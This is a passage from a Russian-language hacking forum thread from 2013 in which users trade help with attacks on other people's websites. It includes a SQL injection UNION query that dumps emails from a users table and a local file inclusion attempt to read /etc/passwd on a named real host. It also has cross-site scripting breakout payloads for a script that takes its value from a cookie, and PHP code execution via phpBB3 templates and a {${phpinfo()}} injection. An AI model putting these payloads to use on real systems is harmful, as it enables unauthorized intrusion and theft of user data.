Старый 04.03.2013, 08:28   #2741
durito
 
Регистрация: 02.03.2011
Сообщений: 76
Репутация: 2
По умолчанию

вот впервые столкнулся с такой траблой используя метод 4.2 Объеденение с помощью GROUP_CONCAT
https://rdot.org/forum/showthread.php?t=124
один и тот же запрос, на одном и том же сайте в случае обращения к данным в таблицах разных баз site1.users и site2.users , в первом случае выводит все данные между начальным и конечным значением, во втором - только часть данных с начальным значением. не видя конечного значения, скрипт не дампит. вопрос почему не выводятся все данные включая конечное значение?

Код:
/index.php?id=1+and+1%3D2+UNION+SELECT+1%2CCONCAT%280x68646A7338636466323364%2CGROUP_CONCAT%28CONCAT_WS%280x3a%2Csex%2Cemail%29+ORDER+BY+CONCAT_WS%280x3a%2Csex%2Cemail%29+SEPARATOR+0x7c%29%2C0x6A75396F776B65646E7373%29%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10+FROM+site1.users+WHERE+1--+
в одном случае имеем: hdjs8cdf23d--тут данные--ju9owkednss
в другом : hdjs8cdf23d--тут данные большей частью обрезаются-- конечного значения нет

сайт один, базы разные. что может быть?
durito вне форума   Ответить с цитированием
Старый 04.03.2013, 10:46   #2742
oRb
 
Аватар для oRb
 
Регистрация: 01.07.2010
Сообщений: 319
Репутация: 138
По умолчанию

group_concat_max_len ?
__________________
Не оказываю никаких услуг.
I don't provide any services.
oRb вне форума   Ответить с цитированием
Старый 04.03.2013, 11:00   #2743
Faaax
 
Аватар для Faaax
 
Регистрация: 03.04.2012
Сообщений: 95
Репутация: 6
По умолчанию

помогите плз разобраться,
ни как не получается произвести LFI
Код:
http://torpedo.rg.ru:81/team.php?id=../../../../../etc/passwd%00
помогите разобраться 100500 слешей тоже результатов не дали.
Faaax вне форума   Ответить с цитированием
Старый 04.03.2013, 11:39   #2744
Pronzn
 
Регистрация: 27.06.2012
Сообщений: 9
Репутация: 0
По умолчанию

Здравствуйте. Подскажите пож-та как можно обойти. В шаблоне можно вывести текст. Текст находится внутри html комментария и - экранируются. Т.е. закрыть комментарий не получается. Что можно придумать?
Pronzn вне форума   Ответить с цитированием
Старый 04.03.2013, 11:39   #2745
durito
 
Регистрация: 02.03.2011
Сообщений: 76
Репутация: 2
По умолчанию

oRb скорее всего
durito вне форума   Ответить с цитированием
Старый 04.03.2013, 17:54   #2746
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

Цитата:
Сообщение от Pronzn Посмотреть сообщение
Здравствуйте. Подскажите пож-та как можно обойти. В шаблоне можно вывести текст. Текст находится внутри html комментария и - экранируются. Т.е. закрыть комментарий не получается. Что можно придумать?
а что надо-то? Сам почитай плз то, что написал, и представь, что не знаешь, о чем идет речь

Тут два варианта - либо тебе надо выполнить php-код, либо javascript. И в том и в другом случае информации не достаточно. Приведи пример того, как выглядит шаблон до и после вставки кода, и точно укажи место, где трабл

PS: если это shop-free - забудь

Последний раз редактировалось Pashkela; 04.03.2013 в 18:11..
Pashkela вне форума   Ответить с цитированием
Старый 05.03.2013, 13:38   #2747
Pronzn
 
Регистрация: 27.06.2012
Сообщений: 9
Репутация: 0
По умолчанию

Цитата:
Сообщение от Pashkela Посмотреть сообщение
а что надо-то? Сам почитай плз то, что написал, и представь, что не знаешь, о чем идет речь

Тут два варианта - либо тебе надо выполнить php-код, либо javascript. И в том и в другом случае информации не достаточно. Приведи пример того, как выглядит шаблон до и после вставки кода, и точно укажи место, где трабл

PS: если это shop-free - забудь
Нет не shop-free.

есть код
Код:
<script type="text/javascript">//
<!--
test111.init({'authuid':'11111'})
//-->
</script>
Значение authuid берется из cookie's. Пробую закрыть комментарий и выполнить алерт.
Передаю "11111-->alert(1)<!--"

Получаю:
Код:
<script type="text/javascript">//
<!--
test111.init({'authuid':'11111-\->alert(1)'})
//-->
</script>
"<!--" - обрезалось и в "-->" экранируется второе тире. Как это можно обойти?
Pronzn вне форума   Ответить с цитированием
Старый 05.03.2013, 14:45   #2748
BlackFan
 
Аватар для BlackFan
 
Регистрация: 08.07.2010
Сообщений: 354
Репутация: 402
По умолчанию

Цитата:
Сообщение от Pronzn Посмотреть сообщение
Нет не shop-free.

есть код
Код:
<script type="text/javascript">//
<!--
test111.init({'authuid':'11111'})
//-->
</script>
Значение authuid берется из cookie's. Пробую закрыть комментарий и выполнить алерт.
Передаю "11111-->alert(1)<!--"

Получаю:
Код:
<script type="text/javascript">//
<!--
test111.init({'authuid':'11111-\->alert(1)'})
//-->
</script>
"<!--" - обрезалось и в "-->" экранируется второе тире. Как это можно обойти?
'*alert(1)*'
</script><script>alert(1);</script>
BlackFan вне форума   Ответить с цитированием
Старый 05.03.2013, 21:10   #2749
nomad
 
Аватар для nomad
 
Регистрация: 23.07.2010
Сообщений: 179
Репутация: 7
По умолчанию

Что за ерунда: есть админка phpbb3, включено выполнение php в шаблонах, редактирую шаблон, а весь код после <!-- PHP --> не записывается. Пробовал вычистить полностью шаблон, и просто записать
Код HTML:
<!-- PHP -->
   phpinfo();
<!-- ENDPHP -->
В результате в шаблоне остается только <!-- PHP -->
Кто-то сталкивался с таким?

PS Доп.инфо: стиль в системе только один, поэтому вариант правки неактивного стиля исключается.
__________________
Roamer, wanderer
Nomad, vagabond
Call me what you will

(c) Metallica

Последний раз редактировалось nomad; 05.03.2013 в 21:20..
nomad вне форума   Ответить с цитированием
Старый 05.03.2013, 21:16   #2750
rogatiy
 
Регистрация: 04.03.2013
Сообщений: 6
Репутация: 0
По умолчанию

Потёрли мою тему злые модераторы, да даже причину сообщить не изволили. Ну и ладно!
Собснна, вопрос - где можно почитать про синтаксис PHP-инъекций в URL? К примеру, имеется у нас сайт N, а на этом сайте уязвимость /search/?name=, пропускающая PHP-инъекции, то есть запрос /search/?name={${phpinfo()}} выводит phpinfo, а больше я ничего и не могу, ибо синтаксиса не знаю.
rogatiy вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2022, Jelsoft Enterprises Ltd. Перевод: zCarot